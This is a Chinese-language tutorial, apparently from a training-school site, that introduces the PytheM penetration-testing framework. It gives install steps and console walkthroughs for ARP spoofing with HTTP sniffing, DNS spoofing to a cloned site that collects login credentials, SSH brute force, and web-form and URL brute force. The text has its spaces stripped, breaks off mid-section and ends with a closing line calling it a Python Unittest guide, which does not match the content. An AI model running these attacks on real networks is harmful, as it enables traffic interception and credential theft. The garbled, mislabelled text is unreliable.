PytheM是一個Python滲透測試框架。它只能在osnGNU/LinuxOS系統上運行。

安裝

$sudoapt-getupdate$sudoapt-getinstalllibasound-devlibjack-jackd2-devportaudio19-devpython-pyaudiobuild-essentialpython-devlibnetfilter-queue-devlibespeak1libffi-devlibssl-dev$sudogitclonehttps://github.com/m4n3dw0lf/PytheM/$cdPytheM$sudopipinstall-rrequirements.txt

運行

$sudo./pythem

例子

ARP欺騙-HTTP中間人攻擊

命令：

pythem>setinterface[+]Entertheinterface:wlan0pythem>setgateway[+]Enterthegateway:192.168.1.1pythem>arpspoofstart[+]Settingthepacketforwarding.[+]Iptablesredefined.[+]ARPspoofinginitialized.pythem>sniff[+]Enterthefilter:http

ARP+DNS欺騙-重定向到偽造的頁面，收集登錄憑證

使用SET等克隆工具克隆你選中的網站，并部署在Apache2上

命令：

pythem>settarget[+]Enterthetarget(s):192.168.0.8pythem>setinterfacewlan0pythem>setgateway192.168.0.1pythem>arpspoofstart[+]Settingthepacketforwarding.[+]Iptablesredefined.[+]ARPspoofinginitialized.pythem>dnsspoofstart[+]Domaintobespoofed:www.google.com[+]IPaddresstoberedirected:192.168.0.6[+]DNSspoofinginitialized.pythem>sniffdns

SSH暴破-暴力破解

pythem>servicesshstartpythem>settarget[+]Enterthetarget(s):127.0.0.1pythem>setfilewordlist.txtpythem>brute-forcessh[+]Entertheusernametobruteforce:anon123

Web頁面參數暴力破解

首先獲取web頁面登錄時的參數格式id=value

顯示重定向頁面，如果定向到一個不同的頁面則說明猜解正確。

命令

pythem>settargethttp://127.0.0.1/pythem>setfile[+]Enterthepathtothefile:wordlist.txtpythem>brute-forcewebform[+]Brute-Formauthenticationinitialized.[+]Entertheinputidoftheusernamebox:vSIS_ID[+]Entertheinputidofthepasswordbox:vSIS_PASS[+]Entertheusernametobrute-forcetheformulary:root

URL內容爆破

pythem>settarget[+]Enterthetarget(s):http://testphp.vulnweb.com/index.php?id=pythem>setfile1to100.txtpythem>brute-forceurl[+]ContentURLbruterinitialized.

功能

[PytheM–PenetrationTestingFrameworkv0.3.2]

help:

打印幫助信息。

exit/quit:

退出程序。

set:

設置變量的值，參數：

interface

gateway

target

file

arpmode例子:

pythem>setinterface|openinputtoset

或者

pythem>setinterfacewlan0|don'topeninputtosetvalue

print:

打印變量的值，例子：

pythem>printgateway

scan:

進行tcp/manualport/arp掃描.

(應該在設置完網卡和目標后再調用)例子:

pythem>scan

或者

pythem>scantcp

arpspoof:

開始或結束arpspoofing攻擊.(使用rep或req可以設置arp欺騙的模式，rep表示欺騙響應，req表示欺騙請求)

參數

start

stop

例子:

arpspoofstartarpspoofstop

dnsspoof:

開始dnsspoofing攻擊.(應該在arp欺騙攻擊開始后再調用)例子:

pythem>dnsspoofstartpythem>dnsspoofstop

sniff:

開始嗅探數據包(應該在設置網卡后再調用)例子:

pythem>sniffhttp

或者

pythem>sniff

[+]Enterthefilter:port1337andhost10.0.1.5|tcpdumplikeformatorhttp,dnsspecificfilter.

pforensic:

開始分析數據包(應該在設置完網卡和.pcap文件后調用)例子:

pythem>pforensicpforensic>help

brute-force:

開始暴力破解攻擊(應該在設置完目標和字典文件路徑后調用)參數:

ssh|目標是IP地址ipaddressastargeturl|目標是url(包含http://或https://)webform|目標是url(包含http://或https://)例子:pythem>brute-forcewebformpythem>brute-forcessh

geoip:

顯示IP地址的大概位置(應該在設置目標(IP地址)后再調用)例子:

pythem>geoip

或者

pythem>geoip8.8.8.8

decodeandencode:

以選擇的模式解碼和編碼字符串，例子:

pythem>decodebase64pythem>encodeascii

cookiedecode:

解碼base64url編碼的cookie的值，例子:

pythem>cookiedecode

其它在控制臺可以執行的命令，比如cd,ls,nano,cat等。

Jarvis–聲音控制助手

[*]jarvistypejarvis-helptoseethejarvishelppage.examples:pythem>jarvis(以語音識

以上內容為大家介紹了Python的Unittest單元測試使用詳解，希望對大家有所幫助，如果想要了解更多Python相關知識，請關注IT培訓機構:千鋒教育。